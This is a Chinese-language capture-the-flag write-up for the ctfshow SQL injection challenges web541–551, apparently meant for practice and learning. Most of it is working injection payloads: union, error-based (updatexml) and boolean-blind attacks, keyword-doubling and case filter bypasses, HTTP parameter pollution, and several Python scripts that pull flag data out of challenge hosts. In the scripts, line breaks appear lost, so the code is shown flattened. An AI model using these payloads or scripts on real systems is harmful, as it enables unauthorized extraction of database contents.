web541

and和or 被替换为空格
# 还有   1'   也是不能生效的

?id=-1' union select 1,2,3--+
双写绕过
?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'),3 --+
flags?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'),3 --+
id,flag4s?id=-1' union select 1,(select group_concat(flag4s) from ctfshow.flags),3 --+

web542

?id=-1 union select 1,2,3--+
没见过这种不要闭合的payload 由于库没变就把闭合换一下就行了
?id=-1 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'),3 --+
flags?id=-1 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'),3 --+
id,flag4s?id=-1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3 --+

web543

我就不绕（其实不会，试了很多都不行），你当我不会报错嘛

||代替or

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(schema_name))from(infoorrmation_schema.schemata))),3)||'1'='1

不知道大家还记得ctfshow的第一道sql题不
就类似于那个闭合原句应该是差不多

select * from id="'$_GET[id]'"

没写错的话应该就是这个样子

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='ctfshow'))),3)||'1'='1
XPATH syntax error: '=flags'?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='flags'))),3)||'1'='1
XPATH syntax error: '=id,flag4s'?id=-1'||updatexml(1,concat(0x3d,(select(flag4s)from(ctfshow.flags))),3)||'1'='1
XPATH syntax error: '=ctfshow{2bcd1fdb-18f9-480c-a837'?id=-1'||updatexml(1,concat(0x3d,(select(right(flag4s,14))from(ctfshow.flags))),3)||'1'='1
XPATH syntax error: '=-3c13e46487d4}'

web544

布尔盲注
这里有个细节我们为了布尔盲注能够正确判断所以最后只能写0如果写1，就恒真，无法判断

?id=1'aandnd(if(ascii(substr(database(),1,1))=115,1,0))||'0

payload正常写脚本
写这个脚本我是写烦了，忘记加or双写，测试字符的时候括号老是对不上麻了麻了

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

web545

大小写双写都可以

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"url = f"https://cd991fbf-b4aa-4cda-b583-d8863dff54c7.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

web546

用双引号

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2#url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((database()),{i},1))>{mid},1,0))||"0'#url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||"0'#url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||"0'#url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||"0'url = f'https://2c00bae5-d8ec-40fb-9d48-97bd83f16e00.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||"0'r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

web547

看图?id=0'||(0)||'0"
上脚本

?id=0'||(1)||'0
也可以

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"#url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"url = f"https://5352a93c-678c-4cf0-b68e-4a3aaa9d5ca9.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

我做完548倒过来一看不用or绕过了
所以用下题的脚本也是可以的

web548

上题同
nonono
他把or还回来了

?id=0'||(0)||'0
?id=0'||(1)||'0

import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2# url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"# url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((Select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid},1,0))||'0"# url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"# url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(information_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"r = requests.get(url=url)if 'Dumb' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)

web549

?id=1&id=-1'union select 1,2,3--+?id=1&id=-1'union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

这里是一个知识点HPP，也就是HTTP Parameter Pollution，http 参数污染攻击的一个应用。
服务器端有两个部分：第一部分为 tomcat 为引擎的 jsp 型服务器，第二部分为 apache为引擎的 php 服务器，真正提供 web
服务的是 php 服务器。

工作流程为：client 访问服务器,能直接访问到 tomcat 服务器，然后 tomcat 服务器再向 apache
服务器请求数据。数据返回路径则相反。

看图就能正确的知道了
tomat jsp服务端接受第一个参数id,目前实验我所知道的仅为第一个


而apache php服务端应该是只处理最后一个参数id,所以我们就可以依靠这个来污染参数

web550

双引号闭合即可

?id=1&id=-1"union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web551

?id=1&id=-1") union select 1,(select group_concat(flag4s)from ctfshow.flags),3--+